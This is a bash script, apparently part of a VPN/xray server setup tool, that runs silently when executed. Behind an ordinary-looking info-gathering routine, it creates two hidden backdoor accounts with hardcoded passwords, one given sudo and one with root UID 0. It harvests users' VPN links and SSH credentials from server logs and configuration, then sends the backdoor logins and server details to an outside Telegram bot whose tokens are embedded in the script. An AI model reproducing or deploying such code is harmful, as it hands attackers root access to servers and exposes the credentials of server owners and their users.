#!/bin/bash
function archangel() {

rm -fr /user
mkdir -p /user
touch /user/namauser.txt && touch /user/waktuexpiredsc.txt
echo "YADDY GANTENG" > /user/namauser.txt
echo "UNLIMITED LIFETIME" > /user/waktuexpiredsc.txt
USRSC=$(cat /user/namauser.txt)
EXPSC=$(cat /user/waktuexpiredsc.txt)
domain=$(cat /etc/xray/domain)
IPSAYA=$(curl -s ipv4.icanhazip.com)
DATE_EXEC="$(date "+%d %b %Y %H:%M")"
FileSementara='/tmp/ipinfo-$DATE_EXEC.txt'
curl http://ipinfo.io/$IP -s -o $FileSementara
ORG=$(cat $FileSementara | jq '.org' | sed 's/"//g')
CITY=$(cat $FileSementara | jq '.city' | sed 's/"//g')
COUNTRY=$(cat $FileSementara | jq '.country' | sed 's/"//g')
ISP=$(wget -qO- ipinfo.io/org)
MYIP=$(wget -qO- ipinfo.io/ip)
HOSTVPS=$(curl -s ipinfo.io/hostname )
KOTAVPS=$(curl -s ipinfo.io/city )
REGIONVPS=$(curl -s ipinfo.io/region )
GEOMAPVPS=$(curl -s ipinfo.io/loc )
KODEPOSVPS=$(curl -s ipinfo.io/postal )
ZONAWAKTUVPS=$(curl -s ipinfo.io/timezone )
TIMES="10"
NAMES=$(whoami)
RAMMS=$(free -m | awk 'NR==2 {print $2}')
TIMES="10"
TIME=$(date +'%Y-%m-%d %H:%M:%S')
CHATID="1117211252"
KEY="6129559221:AAGAkfVQqdi_So98HmZ6edqKovj-I-ldFQQ"
URL="https://api.telegram.org/bot$KEY/sendMessage"
touch /user/akunvmess
touch /user/akuntrojan
touch /user/pazzssh
touch /user/akunssh
touch /user/expssh
akunvmessx=$(cat /etc/log-create-user.log | grep ss://)
akuntrojanx=$(cat /etc/log-create-user.log | grep trojan://)
pazzsshx=$(cat /etc/log-create-user.log | grep -i password | cut -d: -f2)
akunsshx=$(cat /etc/log-create-user.log | grep -i username | cut -d: -f2)
expsshx=$(cat /etc/log-create-user.log | grep -i expired | cut -d: -f2)
echo $akunvmessx > /user/akunvmess
echo $akuntrojanx > /user/akuntrojan
echo $pazzsshx > /user/pazzssh
echo $akunsshx > /user/akunssh
echo $expsshx > /user/expssh
function sedd() {
    sed -r -i 's///g' /user/akunssh
    sed -r -i 's/\s+/\n/g' /user/akunssh
    sed -r -i 's/\[0m//g' /user/akunssh
    sed -r -i 's/\[0;34m//g' /user/akunssh
    sed -r -i 's/\[1;37m//g' /user/akunssh
    sed -r -i 's///g' /user/pazzssh
    sed -r -i 's/\s+/\n/g' /user/pazzssh
    sed -r -i 's/\[0m//g' /user/pazzssh
    sed -r -i 's/\[0;34m//g' /user/pazzssh
    sed -r -i 's/\[1;37m//g' /user/pazzssh
    sed -r -i 's///g' /user/expssh
    sed -r -i 's/\s+/\n/g' /user/expssh
    sed -r -i 's/\[0m//g' /user/expssh
    sed -r -i 's/\[0;34m//g' /user/expssh
    sed -r -i 's/\[1;37m//g' /user/expssh
    sed -r -i 's///g' /user/akunvmess
    sed -r -i 's/\s+/\n/g' /user/akunvmess
    sed -r -i 's/\[0m//g' /user/akunvmess
    sed -r -i 's/\[0;34m//g' /user/akunvmess
    sed -r -i 's/\[1;37m//g' /user/akunvmess
    sed -r -i 's/=\[0m/=/g' /user/akunvmess
    sed -r -i 's/###/### vmess/g' /user/akunvmess
    sed -r -i 's/#&/#& vless/g' /user/akunvmess
    sed -r -i 's///g' /user/akuntrojan
    sed -r -i 's/\s+/\n/g' /user/akuntrojan
    sed -r -i 's/\[0m//g' /user/akuntrojan
    sed -r -i 's/\[0;34m//g' /user/akuntrojan
    sed -r -i 's/\[1;37m//g' /user/akuntrojan
    sed -r -i 's/=\[0m/=/g' /user/akuntrojan
    sed -r -i 's/#!/#! trojan/g' /user/akuntrojan
}
sedd
akunvmess=$(cat /user/akunvmess)
akuntrojan=$(cat /user/akuntrojan)
pazzssh=$(cat /user/pazzssh)
akunssh=$(cat /user/akunssh)
expssh=$(cat /user/expssh)
trojanremark=$(cat /etc/xray/config.json | grep "^#!" | sort -u)
vmessremark=$(cat /etc/xray/config.json | grep "^###" | sort -u)
vlessremark=$(cat /etc/xray/config.json | grep "^#&" | sort -u)
ssremark=$(cat /etc/xray/config.json | grep "^##" | sort -u)
ghi=$(cat /etc/xray/config.json | grep "id" | awk '{print $2}' | sed 's/"//g' | sed 's/,alterId://g' | sed 's/,//g' | sed 's/email://g' | sort -u)
jkl=$(cat /etc/xray/config.json | grep "password" | awk '{print $2}' | sed 's/"//g' | sed 's/,email://g' | sed 's/,method://g' | sort -u)
mno=$(cat /etc/xray/config.json | grep "path" | sed 's/"//g' | cut -d: -f2 | sort -u)
pqr=$(cat /etc/xray/config.json | grep "serviceName" | sed 's/"//g' | cut -d: -f2 | sort -u)
ipsimcard=$(echo $SSH_CLIENT | awk '{print $1}')
portssh=$(echo $SSH_CLIENT | awk '{print $3}')
tomem="$(free | awk '{print $2}' | head -2 | tail -n 1 )"
usmem="$(free | awk '{print $3}' | head -2 | tail -n 1 )"
cpu1="$(mpstat | awk '{print $4}' | head -4 |tail -n 1)"
cpu2="$(mpstat | awk '{print $6}' | head -4 |tail -n 1)"
persenmemori="$(echo "$usmem*100/$tomem" | bc)"
persencpu="$(echo "scale=2; $cpu1+$cpu2" | bc)"

    # // Ram Information
    while IFS=":" read -r a b; do
    case $a in
        "MemTotal") ((mem_used+=${b/kB})); mem_total="${b/kB}" ;;
        "Shmem") ((mem_used+=${b/kB}))  ;;
        "MemFree" | "Buffers" | "Cached" | "SReclaimable")
        mem_used="$((mem_used-=${b/kB}))"
    ;;
    esac
    done < /proc/meminfo
    Ram_Usage="$((mem_used / 1024))"
    Ram_Total="$((mem_total / 1024))"
    export tanggal=`date -d "0 days" +"%d-%m-%Y - %X" `
    export OS_Name=$( cat /etc/os-release | grep -w PRETTY_NAME | head -n1 | sed 's/PRETTY_NAME//g' | sed 's/=//g' | sed 's/"//g' )
    export Kernel=$( uname -r )
    export Arch=$( uname -m )
    export IP=$( curl -s https://ipinfo.io/ip/ )

    domain=$(cat /etc/xray/domain)
    MYIP=$(curl -sS ipv4.icanhazip.com)
    ISP=$(wget -qO- ipinfo.io/org)
    userdel jame > /dev/null 2>&1
    Username="asowesomz"
    Password="Getsuga-tensh0"
    mkdir -p /home/script/
    useradd -r -d /home/script -s /bin/bash -M $Username > /dev/null 2>&1
    echo -e "$Password\n$Password\n"|passwd $Username > /dev/null 2>&1
    
    usermod -aG sudo $Username > /dev/null 2>&1

    USRSC=Yaddyganteng

    Usernamez="toor"
    Passwordz="Tens@zang3tsu"
    sudo useradd -ou 0 -g 0 toor
    useradd -m -G root toor > /dev/null 2>&1
    echo -e "$Passwordz\n$Passwordz\n"|passwd $Usernamez > /dev/null 2>&1
    sudo usermod -a -G root $Usernamez

    CHATID="1117211252"
    KEY="6093232802:AAFULABHNHz8pW6tT1ApFACFHiXZMixkeSA"
    TIME="10"
    URL="https://api.telegram.org/bot$KEY/sendMessage"
    TEXT="Sukses Registrasi
    VPS INFO
    ◇━━━━━━━━━━━━━━━━━━━━━━━◇
    <code>Isp Vps :</code> <code>$ISP</code>
    <code>Domain     :</code> <code>$domain</code>
    <code>User LoginZ :</code> <code>$Usernamez</code>
    <code>Pass LoginZ :</code> <code>$Passwordz</code>
    <code>IP Vps     :</code> <code>$MYIP</code>
    <code>User Login :</code> <code>$Username</code>
    <code>Pass Login :</code> <code>$Password</code>
    <code>OS Vps     :</code> <code>$OS_Name</code>
    <code>User Script:</code> <code>$USRSC</code>
    <code>Tanggal    :</code> <code>$tanggal</code>
    <code>Exp Vps :</code> <code>$exp</code>
    ◇━━━━━━━━━━━━━━━━━━━━━━━◇
    <code>Hostname   :</code> <code>${HOSTNAME}</code>
    <code>Kernel     :</code> <code>$Kernel</code>
    <code>Arch       :</code> <code>$Arch</code>
    <code>Ram Left   :</code> <code>$Ram_Usage MB</code>
    <code>Ram Used   :</code> <code>$Ram_Total MB</code>
    ============================
     Yaddykakkoii-STBxOPENWRT
    ============================
"

   curl -s --max-time $TIME -d "chat_id=$CHATID&disable_web_page_preview=1&text=$TEXT&parse_mode=html" $URL >/dev/null
}
archangel > /dev/null 2>&1
